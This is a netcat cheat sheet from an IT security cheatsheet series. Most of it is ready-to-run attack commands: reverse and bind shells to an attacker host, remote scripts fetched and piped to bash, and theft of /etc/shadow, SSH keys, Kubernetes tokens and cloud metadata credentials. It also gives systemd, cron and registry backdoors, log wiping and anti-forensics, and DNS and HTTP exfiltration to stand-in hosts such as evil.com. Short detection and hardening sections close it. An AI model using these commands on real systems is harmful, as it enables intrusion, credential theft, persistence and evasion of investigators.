```
===============================================================================
                     NETCAT SECURITY PROFESSIONAL CHEATSHEET
                               JOHLEM.net
                           IT SECURITY CHEATSHEETS
===============================================================================

--- NETCAT OVERVIEW ---

# Netcat Variants
nc                    # Traditional netcat (GNU version)
ncat                  # Nmap's modern netcat with SSL/TLS support
netcat                # OpenBSD netcat (most secure, limited features)
socat                 # Extended netcat with advanced features
cryptcat              # Netcat with encryption support

# Core Capabilities
Port Scanning         # Network reconnaissance
Banner Grabbing       # Service identification
File Transfer         # Data exfiltration/infiltration
Remote Shell          # Command execution
Proxy/Relay           # Traffic forwarding
Network Testing       # Connectivity validation

# Basic Syntax
nc [options] [hostname] [port]
nc -l [options] [port]           # Listen mode
nc -z [hostname] [port-range]    # Port scan mode

--- INSTALLATION AND VARIANTS ---

# Ubuntu/Debian Installation
sudo apt update
sudo apt install netcat-openbsd     # OpenBSD version (recommended)
sudo apt install netcat-traditional # GNU version
sudo apt install nmap              # Includes ncat

# CentOS/RHEL Installation
sudo yum install nc
sudo yum install nmap-ncat          # Ncat version

# Verify Installation
which nc
nc -h                              # Help and version info
ncat --version                     # Ncat version

# Compile from Source (Traditional)
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
tar -xzf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure && make && sudo make install

--- PORT SCANNING AND RECONNAISSANCE ---

# Basic Port Scanning
nc -z -v target.com 80             # Test single port
nc -z -v target.com 1-1000         # Scan port range
nc -z -v -w 1 target.com 1-65535   # Full port scan with timeout

# UDP Port Scanning
nc -u -z -v target.com 53          # DNS port scan
nc -u -z -v target.com 1-1000      # UDP port range scan

# Banner Grabbing
nc target.com 80                   # HTTP banner
nc target.com 22                   # SSH banner
nc target.com 25                   # SMTP banner
nc target.com 21                   # FTP banner

# Service Identification
echo "GET / HTTP/1.0\r\n\r\n" | nc target.com 80
echo "HELP" | nc target.com 25     # SMTP commands
echo "USER anonymous" | nc target.com 21  # FTP commands

# Advanced Port Scanning
nc -z -v -n target.com 1-1000      # No DNS resolution
nc -z -v -w 2 target.com 1-1000    # 2-second timeout
nc -z -v -s source_ip target.com 80 # Source IP spoofing

# Stealth Scanning Techniques
# Use random delays between scans
for port in {1..1000}; do
    nc -z -v -w 1 target.com $port 2>&1 | grep succeeded
    sleep $(shuf -i 1-5 -n 1)
done

# Parallel Port Scanning
parallel -j 50 nc -z -v -w 1 target.com ::: {1..1000}

--- PENETRATION TESTING TECHNIQUES ---

# Reverse Shell (Attacker Machine)
nc -l -p 4444                      # Listen for incoming connection
nc -l -v -p 4444                   # Verbose listening
nc -l -p 4444 -s 0.0.0.0           # Listen on all interfaces

# Reverse Shell (Target Machine)
nc attacker_ip 4444 -e /bin/bash   # Linux reverse shell
nc attacker_ip 4444 -e cmd.exe     # Windows reverse shell

# Alternative Reverse Shell Methods
# Linux alternatives (when -e is not available)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attacker_ip 4444 > /tmp/f
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Multi-stage Reverse Shell
# Stage 1: Download and execute
echo 'wget http://attacker_ip/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh' | nc attacker_ip 4444

# Persistent Reverse Shell with Reconnection
while true; do nc attacker_ip 4444 -e /bin/bash; sleep 60; done

# Bind Shell (Target Machine)
nc -l -p 4444 -e /bin/bash         # Linux bind shell
nc -l -p 4444 -e cmd.exe           # Windows bind shell

# Bind Shell Connection (Attacker)
nc target_ip 4444                  # Connect to bind shell

# Advanced Shell Techniques
# TTY Shell Upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'

# Interactive Shell with proper terminal
script /dev/null -c bash
# Then Ctrl+Z, stty raw -echo; fg; reset; export SHELL=bash; export TERM=xterm

# Encrypted Reverse Shell (using ncat)
# Attacker machine
ncat -l -p 4444 --ssl

# Target machine
ncat attacker_ip 4444 --ssl -e /bin/bash

# UDP Reverse Shell
# Attacker machine
nc -u -l -p 4444

# Target machine
nc -u attacker_ip 4444 -e /bin/bash

# Multiple Connection Handler
# Accept multiple reverse shells
while true; do nc -l -p 4444 -e /bin/bash; done

# Port Knocking Shell
# Sequence: knock ports 1000, 2000, 3000, then connect to 4444
for port in 1000 2000 3000; do nc -z target_ip $port; done; nc target_ip 4444

# Web Shell via HTTP
# Simple HTTP backdoor
while true; do echo -e "HTTP/1.1 200 OK\n\n$(bash -c "$(echo $query | sed 's/.*cmd=\([^&]*\).*/\1/' | python -c 'import sys,urllib.parse; print(urllib.parse.unquote(sys.stdin.read()))')" 2>&1)" | nc -l -p 8080 -q 1; done

# Covert Channel via DNS
# Exfiltrate data via DNS queries (base64 encoded)
data=$(cat /etc/passwd | base64 | tr -d '\n')
for chunk in $(echo $data | fold -w 60); do
    echo $chunk | nc -u dns_server 53
done

# ICMP Shell (requires raw sockets)
# Send commands via ICMP echo requests
hping3 -1 -d 100 -E command_here target_ip

# Service Enumeration via Netcat
# SNMP enumeration
echo -e '\x30\x26\x02\x01\x00\x04\x06public\xa0\x19\x02\x01\x00\x02\x01\x00\x30\x0b\x30\x09\x06\x05\x2b\x06\x01\x02\x01\x05\x00' | nc -u target_ip 161

# SMB enumeration
echo -e '\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00' | nc target_ip 445

# RDP detection
echo "rdp" | nc target_ip 3389

# Telnet automation
(echo "admin"; sleep 1; echo "password"; sleep 1; echo "show version"; sleep 2) | nc target_ip 23

# Brute Force Testing
# SSH brute force simulation
for user in admin root test; do
    for pass in admin password 123456; do
        echo "Trying $user:$pass"
        (echo "$user"; sleep 1; echo "$pass"; sleep 2) | nc target_ip 22
    done
done

# HTTP authentication brute force
for cred in "admin:admin" "admin:password" "root:root"; do
    user=$(echo $cred | cut -d: -f1)
    pass=$(echo $cred | cut -d: -f2)
    auth=$(echo -n "$user:$pass" | base64)
    echo -e "GET /admin HTTP/1.1\r\nHost: target.com\r\nAuthorization: Basic $auth\r\n\r\n" | nc target.com 80
done

--- FILE TRANSFER OPERATIONS ---

# Send File (Receiver)
nc -l -p 4444 > received_file.txt  # Listen and save to file
nc -l -p 4444 | tar -xzf -         # Receive and extract archive

# Send File (Sender)
nc target_ip 4444 < file_to_send.txt
tar -czf - /etc/passwd | nc target_ip 4444  # Compress and send

# Binary File Transfer
nc -l -p 4444 > received_binary    # Receive binary file
nc target_ip 4444 < binary_file    # Send binary file

# Directory Transfer
tar -czf - /important/directory | nc target_ip 4444
nc -l -p 4444 | tar -xzf -         # Receive directory

# Transfer with Progress Indication
pv large_file.iso | nc target_ip 4444
nc -l -p 4444 | pv > received_file.iso

# Secure File Transfer (with encryption)
# Using GPG encryption
gpg --cipher-algo AES256 --compress-algo 1 --symmetric file.txt | nc target_ip 4444
nc -l -p 4444 | gpg --decrypt > decrypted_file.txt

--- NETWORK TESTING AND DIAGNOSTICS ---

# Connectivity Testing
nc -v target.com 80               # Test HTTP connectivity
nc -v -w 5 target.com 443         # Test HTTPS with timeout
nc -u -v target.com 53            # Test DNS UDP connectivity

# Bandwidth Testing
# Server side
nc -l -p 4444 > /dev/null

# Client side
dd if=/dev/zero bs=1M count=100 | nc target_ip 4444

# Network Latency Testing
time echo "test" | nc target.com 80

# Firewall Testing
nc -z -v target.com 1-65535 2>&1 | grep -v "refused"

# MTU Discovery
nc -u target_ip 4444 < /dev/zero   # Send UDP traffic to test MTU

--- PROXY AND RELAY OPERATIONS ---

# Simple Proxy/Relay
mkfifo backpipe
nc -l -p 8080 0<backpipe | nc target.com 80 1>backpipe

# HTTP Proxy Setup
# Terminal 1 (listener)
nc -l -p 8080 -c 'nc google.com 80'

# Advanced Relay with Logging
mkfifo /tmp/fifo
nc -l -p 8080 < /tmp/fifo | tee log.txt | nc target.com 80 > /tmp/fifo

# SOCKS Proxy Simulation
nc -l -p 1080 -c 'nc $target $port'

# Port Forwarding
nc -l -p 8080 -c 'nc internal_server 80'  # Forward external to internal

--- WEB APPLICATION TESTING ---

# HTTP Request Testing
echo -e "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n" | nc target.com 80

# POST Request with Data
echo -e "POST /login HTTP/1.1\r\nHost: target.com\r\nContent-Length: 25\r\n\r\nuser=admin&pass=password" | nc target.com 80

# Custom Headers Testing
echo -e "GET / HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n" | nc target.com 80

# HTTPS Testing (with ncat)
echo -e "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n" | ncat --ssl target.com 443

# SQL Injection Testing via HTTP
echo -e "GET /search?q=' OR 1=1-- HTTP/1.1\r\nHost: target.com\r\n\r\n" | nc target.com 80

# Session Hijacking Simulation
echo -e "GET /admin HTTP/1.1\r\nHost: target.com\r\nCookie: SESSIONID=stolen_session\r\n\r\n" | nc target.com 80

--- DATABASE AND SERVICE TESTING ---

# MySQL Connection Testing
nc target.com 3306

# PostgreSQL Testing
nc target.com 5432

# SMTP Testing
nc target.com 25
# Manual SMTP commands:
# HELO attacker.com
# MAIL FROM: test@attacker.com
# RCPT TO: victim@target.com
# DATA
# Subject: Test
# 
# Test message
# .
# QUIT

# POP3 Testing
nc target.com 110
# Commands: USER username, PASS password, LIST, RETR 1, QUIT

# IMAP Testing
nc target.com 143
# Commands: A1 LOGIN username password, A2 LIST "" "*", A3 LOGOUT

# LDAP Testing
nc target.com 389

# DNS Testing
echo -e "\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www\x06google\x03com\x00\x00\x01\x00\x01" | nc -u 8.8.8.8 53

--- BACKDOOR AND PERSISTENCE ---

# Persistent Backdoor (systemd service)
cat << 'EOF' > /etc/systemd/system/netcat-backdoor.service
[Unit]
Description=Network Service
After=network.target

[Service]
Type=simple
User=nobody
ExecStart=/bin/nc -l -p 4444 -e /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target
EOF

systemctl enable netcat-backdoor.service

# Cron-based Backdoor
echo "*/5 * * * * nc attacker_ip 4444 -e /bin/bash" | crontab -

# Persistent Reverse Shell Script
#!/bin/bash
while true; do
    nc attacker_ip 4444 -e /bin/bash
    sleep 300
done

# Windows Persistent Backdoor (Registry)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /t REG_SZ /d "nc.exe attacker_ip 4444 -e cmd.exe"

--- ADVANCED PAYLOAD DELIVERY ---

# Stageless Payload Delivery
echo 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' | base64 | nc target_ip 4444

# PowerShell reverse shell via netcat
# Generate PowerShell payload
echo 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"attacker_ip\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"' | nc target_ip 4444

# Multi-protocol payload testing
# Test various protocols for payload delivery
for protocol in tcp udp; do
    for port in 80 443 53 22; do
        echo "Testing $protocol on port $port"
        nc -$protocol -v target_ip $port < payload.txt
    done
done

# Obfuscated payload delivery
# Base64 encoded payload
payload="bash -i >& /dev/tcp/attacker_ip/4444 0>&1"
echo $payload | base64 | nc target_ip 4444

# Hex encoded payload
echo $payload | xxd -p | nc target_ip 4444

# URL encoded payload
echo $payload | python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.stdin.read()))" | nc target_ip 4444

# Binary payload delivery
# Create binary payload and deliver
msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf > payload.bin
nc target_ip 4444 < payload.bin

# Living off the land techniques
# Using legitimate tools for payload delivery
curl http://attacker_ip/shell.sh | bash | nc attacker_ip 4444
wget -qO- http://attacker_ip/shell.sh | bash | nc attacker_ip 4444

--- PRIVILEGE ESCALATION TESTING ---

# SUID binary testing via netcat
find / -perm -4000 2>/dev/null | nc attacker_ip 4444

# Kernel exploit testing
uname -a | nc attacker_ip 4444
cat /proc/version | nc attacker_ip 4444

# Service enumeration for privilege escalation
ps aux | grep root | nc attacker_ip 4444
netstat -tulpn | nc attacker_ip 4444
crontab -l | nc attacker_ip 4444

# Sudo privilege testing
sudo -l | nc attacker_ip 4444
cat /etc/sudoers 2>/dev/null | nc attacker_ip 4444

# Environment variable exploitation
env | nc attacker_ip 4444
cat /etc/environment | nc attacker_ip 4444

# Writable directory identification
find / -writable -type d 2>/dev/null | nc attacker_ip 4444

--- LATERAL MOVEMENT TECHNIQUES ---

# SSH key harvesting
find /home -name "*.pem" -o -name "id_rsa" -o -name "id_dsa" 2>/dev/null | xargs cat | nc attacker_ip 4444

# Credential harvesting
grep -r "password" /home/ 2>/dev/null | nc attacker_ip 4444
cat /etc/passwd | nc attacker_ip 4444
cat /etc/shadow 2>/dev/null | nc attacker_ip 4444

# Network discovery from compromised host
arp -a | nc attacker_ip 4444
ip route | nc attacker_ip 4444
cat /etc/hosts | nc attacker_ip 4444

# Internal service scanning
for ip in 192.168.1.{1..254}; do
    nc -z -v -w 1 $ip 22 80 443 2>&1 | grep succeeded | nc attacker_ip 4444
done

# Active Directory enumeration (Windows)
net user /domain | nc attacker_ip 4444
net group "Domain Admins" /domain | nc attacker_ip 4444
nltest /dclist: | nc attacker_ip 4444

# Pivot through compromised host
# Setup pivot listener
nc -l -p 8080 -c 'nc internal_target 80'

# Chain multiple pivots
nc -l -p 8080 -c 'nc -l -p 8081 -c "nc final_target 80"'

--- DATABASE PENETRATION TESTING ---

# MySQL privilege escalation testing
echo "SELECT user, host, password FROM mysql.user;" | nc mysql_server 3306

# PostgreSQL enumeration
echo "SELECT version();" | nc postgres_server 5432
echo "SELECT current_user;" | nc postgres_server 5432

# MSSQL testing
echo "SELECT @@version;" | nc mssql_server 1433

# Oracle database testing
echo "SELECT banner FROM v\$version;" | nc oracle_server 1521

# NoSQL database testing (MongoDB)
echo '{"ping": 1}' | nc mongodb_server 27017

# Redis exploitation
echo "INFO" | nc redis_server 6379
echo "CONFIG GET *" | nc redis_server 6379

--- NETWORK SERVICE EXPLOITATION ---

# SMTP relay testing
(echo "HELO attacker.com"; echo "MAIL FROM: spoof@victim.com"; echo "RCPT TO: target@victim.com"; echo "DATA"; echo "Subject: Test"; echo ""; echo "Spoofed email test"; echo "."; echo "QUIT") | nc smtp_server 25

# SNMP community string testing
for community in public private admin; do
    echo "Testing community: $community"
    snmpwalk -v2c -c $community target_ip | nc attacker_ip 4444
done

# DNS zone transfer testing
echo -e "server target_ip\nls domain.com\nexit" | nc -t target_ip 53

# NFS enumeration
showmount -e target_ip | nc attacker_ip 4444

# SMB share enumeration
smbclient -L target_ip -N | nc attacker_ip 4444

# RPC service enumeration
rpcinfo -p target_ip | nc attacker_ip 4444

--- WIRELESS NETWORK TESTING ---

# Captive portal bypass testing
echo -e "GET / HTTP/1.1\r\nHost: neverssl.com\r\n\r\n" | nc 93.184.216.34 80

# WiFi deauthentication detection
# Monitor for deauth frames (requires wireless tools)
tcpdump -i wlan0mon | nc attacker_ip 4444

# Evil twin detection
iwlist scan | grep ESSID | nc attacker_ip 4444

# WPS PIN testing simulation
for pin in 12345670 00000000 11111111; do
    echo "Testing WPS PIN: $pin" | nc attacker_ip 4444
done

--- CONTAINER AND CLOUD TESTING ---

# Docker container escape testing
ls -la /proc/1/cgroup | nc attacker_ip 4444
cat /proc/self/mountinfo | nc attacker_ip 4444

# Kubernetes enumeration
kubectl get pods --all-namespaces 2>/dev/null | nc attacker_ip 4444
cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null | nc attacker_ip 4444

# AWS metadata service testing
curl -s http://169.254.169.254/latest/meta-data/ | nc attacker_ip 4444
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ | nc attacker_ip 4444

# Azure metadata testing
curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | nc attacker_ip 4444

# GCP metadata testing
curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/" | nc attacker_ip 4444

--- POST-EXPLOITATION TECHNIQUES ---

# System information gathering
(hostname; id; uname -a; cat /etc/issue; cat /etc/passwd; ps aux; netstat -tulpn; iptables -L 2>/dev/null) | nc attacker_ip 4444

# Persistence establishment
# Add SSH key
echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@machine" >> ~/.ssh/authorized_keys

# Cron persistence
echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'" | crontab -

# Service persistence (systemd)
cat << 'EOF' > /tmp/backdoor.service
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do nc attacker_ip 4444 -e /bin/bash; sleep 300; done'
Restart=always

[Install]
WantedBy=multi-user.target
EOF

# Install service
sudo mv /tmp/backdoor.service /etc/systemd/system/
sudo systemctl enable backdoor.service

# Log cleaning
history -c
echo "" > ~/.bash_history
echo "" > /var/log/auth.log
echo "" > /var/log/syslog

# Anti-forensics
shred -vfz -n 3 /var/log/auth.log
find /var/log -name "*.log" -exec shred -vfz -n 3 {} \;

--- COVERT COMMUNICATION CHANNELS ---

# DNS tunneling simulation
# Encode data in DNS queries
data="secret_data"
encoded=$(echo $data | base64 | tr -d '=')
echo "$encoded.tunnel.domain.com" | nc -u dns_server 53

# HTTP header covert channel
echo -e "GET / HTTP/1.1\r\nHost: target.com\r\nX-Secret: $(echo 'secret' | base64)\r\n\r\n" | nc target.com 80

# ICMP covert channel
# Send data in ICMP payload
echo "secret_message" | xxd -p | while read hex; do
    ping -c 1 -p $hex target_ip
done

# Steganographic data hiding
# Hide shell script in image metadata
echo '#!/bin/bash\nnc attacker_ip 4444 -e /bin/bash' > script.sh
exiftool -Comment="$(cat script.sh | base64)" image.jpg
nc target_ip 4444 < image.jpg

# Protocol hopping
# Switch between different protocols for communication
protocols=(tcp udp)
ports=(80 443 53 22)
for proto in "${protocols[@]}"; do
    for port in "${ports[@]}"; do
        echo "Using $proto on port $port"
        nc -$proto target_ip $port < message.txt
        sleep 5
    done
done

--- AUTOMATED PENETRATION TESTING ---

# Automated vulnerability scanning
for port in 21 22 23 25 53 80 110 135 139 143 443 993 995 1433 3306 3389 5432; do
    echo "Scanning port $port on target_ip"
    timeout 3 bash -c "</dev/tcp/target_ip/$port" && echo "Port $port is open" | nc attacker_ip 4444
done

# Service banner collection script
#!/bin/bash
for port in 21 22 25 53 80 110 143 443 993 995 1433 3306 5432; do
    echo "=== Banner for port $port ===" | nc attacker_ip 4444
    timeout 5 nc target_ip $port < /dev/null | head -5 | nc attacker_ip 4444
done

# Bulk credential testing
#!/bin/bash
users=("admin" "root" "administrator" "user" "test")
passwords=("admin" "password" "123456" "root" "test")

for user in "${users[@]}"; do
    for pass in "${passwords[@]}"; do
        echo "Testing $user:$pass"
        # SSH simulation
        (echo $user; sleep 1; echo $pass; sleep 2) | nc target_ip 22 | nc attacker_ip 4444
    done
done

# Steganographic Exfiltration
# Hide data in image and exfiltrate
steghide embed -cf image.jpg -ef secret.txt
nc attacker_ip 4444 < image.jpg

# DNS Exfiltration Simulation
# Encode data and send via fake DNS queries
echo "SECRET_DATA" | base64 | while read line; do
    nc -u dns_server 53 <<< "$line.evil.com"
done

# ICMP Exfiltration (using hping3 with nc)
echo "secret" | xxd -p | while read hex; do
    hping3 -1 -d 16 -E $hex target_ip
done

# HTTP POST Exfiltration
data=$(cat /etc/passwd | base64)
echo -e "POST /upload HTTP/1.1\r\nHost: attacker.com\r\nContent-Length: ${#data}\r\n\r\n$data" | nc attacker.com 80

# FTP Exfiltration
echo -e "USER anonymous\r\nPASS guest\r\nPASV\r\nSTOR secret.txt\r\n" | nc ftp_server 21

--- ADVANCED EVASION TECHNIQUES ---

# Traffic Fragmentation
echo "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n" | nc -s source_ip target.com 80

# Source Port Spoofing
nc -p 53 target.com 80             # Spoof source port (DNS)
nc -p 80 target.com 443            # Spoof source port (HTTP)

# Timing-based Evasion
nc -i 5 target.com 80              # 5-second interval between lines

# IPv6 Usage
nc -6 target_ipv6 80               # Use IPv6

# Random Source IP (requires raw socket privileges)
nc -s $(shuf -i 1-254 -n 1).$(shuf -i 1-254 -n 1).$(shuf -i 1-254 -n 1).$(shuf -i 1-254 -n 1) target.com 80

# Protocol Confusion
nc -u target.com 80                # Send UDP to TCP port
nc target.com 53                   # Send TCP to UDP port

--- SSL/TLS OPERATIONS (NCAT) ---

# SSL Client Connection
ncat --ssl target.com 443

# SSL Server (Self-signed certificate)
ncat -l -p 443 --ssl

# SSL with Client Certificate
ncat --ssl --ssl-cert client.crt --ssl-key client.key target.com 443

# SSL Verification Bypass
ncat --ssl --ssl-verify target.com 443

# SSL Cipher Testing
ncat --ssl-ciphers HIGH target.com 443

# HTTP over SSL
echo -e "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n" | ncat --ssl target.com 443

--- WIRELESS NETWORK TESTING ---

# Captive Portal Testing
nc target_portal 80
echo -e "GET /login HTTP/1.1\r\nHost: portal.wifi\r\n\r\n" | nc portal_ip 80

# WiFi Authentication Bypass
nc access_point_ip 80
nc dhcp_server 67                  # DHCP discovery

# Rogue Access Point Communication
nc rogue_ap_ip 80                  # Test rogue AP response

--- INCIDENT RESPONSE AND FORENSICS ---

# Network Forensics
nc -l -p 4444 | tee network_capture.log  # Log all incoming data

# Memory Dump Transfer
dd if=/dev/mem | nc forensics_server 4444

# Live System Analysis
netstat -tulpn | nc analyst_machine 4444  # Send network connections
ps aux | nc analyst_machine 4444          # Send process list
lsof | nc analyst_machine 4444            # Send open files

# Evidence Collection
find /var/log -name "*.log" | xargs cat | nc evidence_server 4444

# Secure Evidence Transfer
gpg --encrypt --armor evidence.tar | nc secure_server 4444

--- DETECTION AND MONITORING ---

# Netcat Detection Signatures
# Monitor for suspicious netcat usage
ps aux | grep -E "(nc|netcat|ncat)" | grep -v grep

# Network monitoring for netcat traffic
netstat -tulpn | grep -E ":4444|:1234|:31337"

# Log analysis for netcat indicators
grep -r "nc -l" /var/log/
grep -r "netcat" /var/log/
journalctl | grep -i netcat

# Detect reverse shell patterns
lsof -i | grep -E "(4444|31337|1234)"
ss -tulpn | grep -E "(4444|31337|1234)"

# Monitor for common backdoor ports
nmap -sS localhost -p 4444,31337,1234,8080

--- NETCAT ALTERNATIVES AND TOOLS ---

# Socat (Advanced netcat replacement)
socat TCP-LISTEN:4444,fork TCP:target.com:80  # Port forwarding
socat FILE:`tty`,raw,echo=0 TCP:target.com:4444  # TTY shell

# Ncat (Nmap's netcat)
ncat -l -p 4444 --keep-open        # Keep listening after client disconnect
ncat -l -p 4444 --broker           # Allow multiple clients

# Cryptcat (Encrypted netcat)
cryptcat -l -p 4444 -k password    # Encrypted listener
cryptcat target.com 4444 -k password  # Encrypted client

# PowerShell alternatives (Windows)
Test-NetConnection target.com -Port 80
New-Object System.Net.Sockets.TcpClient("target.com", 80)

# Bash alternatives (when netcat unavailable)
bash -i >& /dev/tcp/target.com/4444 0>&1
exec 5<>/dev/tcp/target.com/80; echo -e "GET / HTTP/1.1\r\n\r\n" >&5; cat <&5

--- SECURITY HARDENING AGAINST NETCAT ---

# Disable netcat system-wide
chmod 000 /usr/bin/nc /bin/nc /usr/bin/netcat
rm -f /usr/bin/nc /bin/nc /usr/bin/netcat

# AppArmor profile for netcat restriction
echo '/usr/bin/nc {
  capability net_bind_service,
  network inet stream,
  network inet dgram,
  deny network raw,
  deny capability sys_admin,
}' > /etc/apparmor.d/usr.bin.nc

# Firewall rules to block common netcat ports
iptables -A INPUT -p tcp --dport 4444 -j DROP
iptables -A INPUT -p tcp --dport 31337 -j DROP
iptables -A INPUT -p tcp --dport 1234 -j DROP

# SELinux policy to restrict netcat
setsebool -P allow_execstack off
setsebool -P allow_execmem off

# Monitor and alert on netcat usage
echo 'audit_rule: -w /usr/bin/nc -p x -k netcat_usage' >> /etc/audit/rules.d/netcat.rules

--- COMMON USE CASES SUMMARY ---

# Security Testing Scenarios
1. Port scanning and service enumeration
2. Banner grabbing for version identification
3. Reverse shell establishment
4. File transfer and data exfiltration
5. Network connectivity testing
6. Protocol fuzzing and testing
7. Proxy and traffic relay
8. SSL/TLS connection testing

# Defensive Applications
1. Network connectivity debugging
2. Service availability testing
3. Bandwidth and latency measurement
4. Log transfer and analysis
5. Secure file sharing
6. Network troubleshooting
7. Incident response data collection

===============================================================================
                            QUICK REFERENCE
===============================================================================

BASIC COMMANDS:
- Listen: nc -l -p PORT
- Connect: nc HOST PORT
- Port Scan: nc -z -v HOST PORT-RANGE
- File Transfer: nc -l -p PORT > file (receiver) | nc HOST PORT < file (sender)
- Banner Grab: nc HOST PORT

PENETRATION TESTING:
- Reverse Shell: nc -l -p 4444 (attacker) | nc ATTACKER_IP 4444 -e /bin/bash (target)
- Bind Shell: nc -l -p 4444 -e /bin/bash (target) | nc TARGET_IP 4444 (attacker)
- HTTP Test: echo -e "GET / HTTP/1.1\r\nHost: HOST\r\n\r\n" | nc HOST 80

SECURITY CONSIDERATIONS:
- Always use in authorized testing environments
- Monitor for unauthorized netcat usage
- Implement proper access controls
- Log and audit netcat activities

===============================================================================